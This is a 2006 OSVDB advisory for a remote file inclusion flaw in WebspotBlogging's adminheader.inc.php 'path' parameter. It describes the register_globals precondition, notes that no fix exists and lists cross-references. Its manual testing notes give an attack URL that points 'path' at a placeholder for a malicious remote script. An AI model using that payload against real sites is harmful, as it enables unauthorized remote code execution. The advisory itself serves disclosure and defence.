WebspotBlogging inc/adminheader.inc.php path Variable Remote File Inclusion

2006-06-03T08:05:30
ID OSVDB:25993
Type osvdb
Reporter Kacper(kacper1964@yahoo.pl)
Modified 2006-06-03T08:05:30

Description

Vulnerability Description

WebspotBlogging contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to inc/adminheader.inc.php not properly sanitizing user input supplied to the 'path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

WebspotBlogging contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to inc/adminheader.inc.php not properly sanitizing user input supplied to the 'path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[Webspotblogging_path]/inc/adminheader.inc.php?path=[evil_scripts]

References:

Vendor URL: http://blogging.webspot.co.uk/ Secunia Advisory ID:20439 Related OSVDB ID: 25992 Related OSVDB ID: 25994 Related OSVDB ID: 25995 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0416.html ISS X-Force ID: 26910 Generic Exploit URL: http://milw0rm.com/exploits/1871 FrSIRT Advisory: ADV-2006-2127 CVE-2006-2860 Bugtraq ID: 18260